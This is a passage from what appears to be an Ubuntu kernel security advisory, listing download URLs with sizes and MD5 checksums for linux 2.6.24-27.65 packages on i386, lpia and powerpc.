Size/MD5:   220482 60bf430685f9b39568dbb078edf6041c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    51932 f708bc6cc86f313031745601d3d31aa9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    52068 bd20c8c1eb151b2b8d989d5081f8386b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    38326 aeea101daeed1f87bb30f67c4011d737\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    39080 b8fc6fd4c6fa20a8cf2a92e150a1b969\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    45990 9c06ca831da0f4183ef6e15af4e9b3cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    46170 8d8cb61faaaf267e135ecd2844afd195\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    83246 6941b39723fc655f7dcf2846e5c8a47e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    83662 d3f22aca87d23a99c75b3e6464eb22fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32396 402518c87d72b3dfc41656de51ebaa64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32672 7135f346092b651dafed111b91aee44d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   637694 e32a7d7a367597e18b305f6d97b93630\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   655982 7e8f7f69c261eaa0ce58ddb865205698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   209878 1ca7ab42cb7cd39e37e711fabaae8b99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   213640 bfc69b0b0b29485a95605fe7e091dd5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    46544 90ef4a74882d5770a3f7d888ba288b35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    47602 e55422dc48484675642c96bdbc673595\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    62270 cc798227f68e2c8c1d8a54b03bf0058a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    63626 a2d3587a68e63d2cf90e1cd3790d1079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   130538 c07adcef7438ef51821f9a8b750f7973\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   137028 068fdde4394c7850abba6ea81e69c801\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   279080 76c07612b0081c38122b1929c7f19f34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   277690 c635d04d78592fe9792024e84682ccc7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  2012458 d372c1d872861cd7c84ea9d06c4e8162\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  2089276 69416120cd161789b598b2b93034db07\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5:   655314 4adb56a8d5211bba1acc02d76e9fb65d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5:   658154 7d6f7bccbf83f9a32664588ab5faaabe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb\n      Size/MD5:  1242098 c22eebab07e9ce3d85526ce2945da263\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb\n      Size/MD5:  1262772 85fe04ee16e27b961017cf148c4f1d21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5:   659870 a3ebd23356d57307d124b62faf3fc2a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5:   561726 410d756762ce992d36864ce38efc2e1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb\n      Size/MD5:  1059932 350947cab60fcafb13483ab14ca0ff95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5: 18380540 1da620cffb3b62617fc8213134b951e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5: 18401264 dd7b7991e7f843ebcae7bc5c8700636d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5: 18513796 c8b5dac38c445a72681bd5dd1c9a1f98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5:  8730742 fc3305910b00833b509a4e34199e4a67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5: 25540786 ce01c05207f08195efd8b88b83a93549\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5: 26356028 ed8deb0b2243fd649476c43d245a9690\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5: 27372622 d07e093dc192ad5a49be8c45b5c85dd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5: 24872642 c28ebc89c9a427352186dea53d81ffe8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb\n      Size/MD5:   707576 d26794effd4e857da1db4d28e9407611\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   258852 b86f8c37480cbd19131432c908013dd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   264136 631fc78981097e46ee5643ec3cfc5616\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   163268 1c98e7380c4f80c461a6181344914fea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   163034 9cc84b270528d0fef36320974b415392\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   236710 755a3caeceece8650e46706804c6e072\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   244984 cc330be20f314b308aa0fbcf95c0370c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1810274 169e24dc79c5fbde1ca1a2a5520286d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1827436 cf166d9cdca76a06fd78b1a0669ed67b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   150836 169c287e6bc754d02924a719d34aad29\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   143018 ee925199234ec977618a5c3c3b03954f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   156072 9ff98bc4b62d033785de95858201c353\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   157158 75cdc15de6d5bdc90e05789eb00fe29d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   107222 37ce3c67bd74d5040aa4d22223cbb486\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   108526 7e50df25fcc29d44c2cfdc3e5c046a66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32958 b1b4b1a1b95db3b09923a39eb42c28e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    33388 860c1b56a45914246929757c815f5ec4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    60694 99aca1f49a5cd919f85ef1600ca757ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    61158 bbe05be947e606b614108423a7ca0b83\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    82652 8ffbf8ae116bd81b7632e2e3a58e0a76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    82954 1532b447c1a1cc43d1cbf46b1e14020f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    48562 d2569ab07923f67de18ed6c63940351c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    48452 dcf73534ccf880da82f6ec8bdad54db7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:     8192 2c3bac93f50147f7f67fffdcbb601b66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:     8444 375a2103e5890c501433ae5b3d912fbb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    51104 8d242482ce8adca7ec8f5d0a40c04c20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    52950 8449d644f2a2455da01bf48922757fd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    92156 232f32e69ea0f4daf4a17ad68542e45f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    92446 6525df043e2a865a6eb646f015140e31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1443710 2746c7d1f27f2638dd6f141c5d7e68ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1427036 d049929f20e6cbec8c7338977af873a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    43240 53538a90e2ae8dae72a91a8aa79ecb90\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    42806 3b1d48b0e38b9acebe7581278a8e0408\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    11402 83264faacaa7ff9c249144d8dd0061b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    12016 7e17c39f818116eae09203af5f5dd870\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   470484 bede1d05dc08ab51105feaff29b39093\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   472422 d08cc1bf2e88df1908f35afc77fd696a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    70518 751bdd069d86773b5a3cfc67a09b46a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    71382 3aa45fd7cdb245416c60a2210066a353\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb\n      Size/MD5: 20248150 fad37a976e62eb5c73f906fd44070b5a\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb\n      Size/MD5: 18543176 2f3a767f3505c51ebac878d921d3f3d8\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb\n      Size/MD5: 18782962 8a5a3287d174aa7fd1cceb71be94f347\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb\n      Size/MD5:   639434 d3cfd21a90ea311f0b1efa2ac28dfac0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb\n      Size/MD5:   705462 81a381fb023a0e0074d8cfaa7fca88b8\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb\n      Size/MD5:   707532 c6bf8f82d8bbc4e2320343f58629a562\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb\n      Size/MD5: 14516344 29b153dcb44d72c1e5862191cb266c6b\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb\n      Size/MD5: 19816106 947ff90add29d1fc18a69145f39341d1\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   334046 06512921aae848be603af54dc56f72e6\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   318530 4e8164b49e3ad90d33c9275bd1c7b45d\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    62718 e53308b729496be4a0e343535769c74e\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    73002 10bf1560cb8abc507ea079f6a495f91b\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    41442 a9d6733876fcf91a271eb189eaffcb37\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    47826 1d54194b81d12ac7b00b910f625f7a59\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    89506 1d66e8fc56eb6437f783cb677e6c7061\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   105746 034c14e0418581e1b8b56913246e96de\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    44824 5430e2953cc84d26fd0c8e8c4e323a92\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    40932 93dc2a167cf8ab1d80426dd296997295\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   704830 ef370acc49192e464ef553984e361d88\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   770960 ac691fac4ab28cb6d9627fa6b7a5b773\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   243328 b280fefee27294e988529239616e68fe\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   246310 c1d7e140ca2ba026b6a168c6c9748476\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    69160 665a09e07612701e5c6bc7efee856e5c\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   132586 f0e732beade4d5154e887aaa1b1f3625\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    70252 d8f056e2c9d8aabe9acacfbe4e6c9de0\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    77462 d69a84be1856d83b83faf1fa820803f6\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   146272 11a1d0911e3fda9667661975972e08b2\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   165002 c4276844b0ea79946508c0cd3a816541\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   387992 53b23049b6f79a9609349927adec3443\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   350468 694a94354856e10bcc935e2a7ba38a51\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  2431460 3a8171d7d1e7e6b37573c6679812d2ae\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  3473330 1037b52b34e3b26b05f68bfafb48850a\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5:   652854 26483fb509f744914f646c49eb7b4d6c\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5:   657530 98dd4c49966d886237bed19fddb84057\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb\n      Size/MD5:   652742 c9f225771751b175bc9a3d1ccb9b2b91\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5: 20175388 98b77e06737b717f07a9f436bf292879\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5: 21378902 be6b07df3db6828d5d795954b3ad3c49\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb\n      Size/MD5: 19948474 1a42e203300936a0a6bbd91270ac925d\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb\n      Size/MD5:   697738 b5f3e2a2bf27249b08f44ca708c75305\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   266748 d71a805e23acc800f21449d312975e04\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   307732 90c6243c8802cdc121bdf92145f7dc17\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   192250 b114447f81aee3dfc51a3c40f2015d66\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   201688 94056840984e621b385099d261ce2420\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   272012 b6790aca1401ed43b8c04befaef9af51\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   306006 50b970f3b69d4eda6d3e59353c9db152\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1807766 ec7ddb35df35bb103f7fa00168c827cd\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  2119612 ee4db3863509964860b0a24a9a6d5951\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   235186 b6a1a89f7279818e17cac5d5b3a8b86e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   225404 baf5ea09bdbab57626dee3afb306a39b\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   170438 b6bae0ce9350745a5c5ba8d969ae34ef\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   199752 9d4225f0960410c78279f61aa02471da\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   117942 e88c2b968d47d71ef068dcb5abd4d9fd\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   139272 5f4576b20a9dc27976d521d0942ad0c9\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    45372 918120c1bd011bbbb8b95529c0978f09\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    46836 10f5de3e02406e28d373098a6613860b\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    51132 610f6b349ffcb68ca7f58dc7928a7558\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    60292 9b17fdf2d2aa9cbcfd3dbfb1bfc3af41\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    74186 053cc99e1839e95e6e48198a187c3e48\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    87220 b730de88a2ee8d0b1503d2ee30f13e69\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    76092 0a6aab3a33606ec7e97d474de29a47db\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    30230 76c4d08ce66715d75db459c89405a0fb\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:     8486 80580934d5e5f6909c396732bedf2055\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    10030 4e52e0e6b321b919404ffa406ccc2da1\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    57438 24e1b5d61bcbe2b2faf9f31d9b6f7d3b\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    68746 1b541e58e95b8022b84e7d050db97ecc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   101184 97ff0fdbf93ef2526b1a97b962592e37\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   147834 eb62d695f6da016ae938924414bd15ed\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1565722 3bf6b2bd7ef98c403f8cedf220978814\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1514590 307c47dc707e3c96384e6ce043c745be\n    